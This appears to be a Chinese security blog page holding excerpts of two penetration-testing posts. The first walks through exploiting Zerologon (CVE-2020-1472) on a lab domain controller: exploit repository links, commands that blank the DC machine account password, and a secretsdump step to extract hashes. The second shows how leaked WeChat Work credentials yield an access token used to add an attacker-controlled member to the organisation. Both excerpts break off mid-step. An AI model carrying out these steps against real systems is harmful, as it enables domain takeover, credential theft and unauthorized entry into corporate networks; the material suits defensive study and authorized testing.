CVE-2020-1472 域内提权漏洞
0x00 前序环境验证poc
1https://github.com/SecuraBV/CVE-2020-1472
打空exp
1https://github.com/risksense/zerologon
impacket包
1https://github.com/SecureAuthCorp/impacket
impacket包下载后在其目录下执行
1python setup.py install
测试环境 Windows Server 2008 ip 192.168.10.10 name DC
0x01 测试是否可以打空本地Hash1python .\zerologon_tester.py DC_NAME DC_IP
检测到以下结果,本地Hash可以被打空
0x02 利用zerologon把本地Hash打空1python .\set_empty_pw.py DC_NAME DC_IP
出现如下结果,本地Hash已被打空
0x03 使用空密码拽出DC上的Hash利用impacket包中examples目录下的secretsdump.py
1python secre ...
记一次从企业微信到内网遨游
构造请求进入企业微信1.1 通过CorpID与secret获取access_token1https://qyapi.weixin.qq.com/cgi-bin/gettoken?corpid=id&corpsecret=secrect
调用该接口,获取access_token
1.2 通过acess_token获取部门ID1https://open.work.weixin.qq.com/devtool/query?e=301002
将access_token进行输入,获取部门信息
1.3 构造请求,将自己的微信号加入企业微信将自己的微信信息POST进创建成员的URL
1https://qyapi.weixin.qq.com/cgi-bin/user/create?access_token=ACCESS_TOKEN
123456{ "userid": "masterperng", "name": "perng", "department": [par ...